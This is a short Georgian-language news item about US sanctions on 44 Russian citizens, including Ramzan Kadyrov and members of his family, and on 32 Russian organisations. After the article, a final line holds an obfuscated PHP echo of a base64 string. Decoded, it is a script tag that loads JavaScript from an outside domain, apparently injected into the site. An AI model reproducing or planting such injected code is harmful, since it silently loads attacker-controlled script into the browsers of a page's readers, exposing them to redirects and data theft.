celsiusi
ავერსი შნაიდერი
ამერიკის შეერთებულმა შტატებმა რუსეთის 44 მოქალაქეს, მათ შორის ჩეჩნეთის ხელმძღვანელს რამზან კადიროვსა და მის ოჯახს სანქციები დაუწესა -  ინფორმაცია რუსულმა interfax- მა გამოაქვეყნა.
 
ცნობები ვრცელდება უკარინული მედიის Telegram-ის არხებშიც. 
 
გამოცემის ცნობით, სანქციების სიაში მოხვდა 32 რუსული ორგანიზაციაც. 
 
აშშ-ს სახაზინო დეპარტამენტის საგარეო აქტივების კონტროლის ოფისის დოკუმენტში აღნიშნულია, რომ სიაში მოხვდნენ ჩეჩნეთის ლიდერი რამზან კადიროვის ოჯახი - მედნი, ფატიმა და ამინათ კადიროვები (აშშ ხაზინის ვებსაიტზე თითოეული მითითებულია როგორც "კადიროვის ერთ-ერთი ცოლი"). ასევე მისი ქალიშვილები აიშატი, ტაბარიკი და კარინა. 
 
BBC წერს, რომ თავად კადიროვი და მისი ოფიციალური მეუღლე მედნი უკვე იმყოფებოდნენ აშშ-ს სანქციების ქვეშ 2020 წლის დეკემბრიდან. ახალი სანქციები ნიშნავს არა მხოლოდ შესვლის აკრძალვას, არამედ აქტივების ჩამორთმევას.
441
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");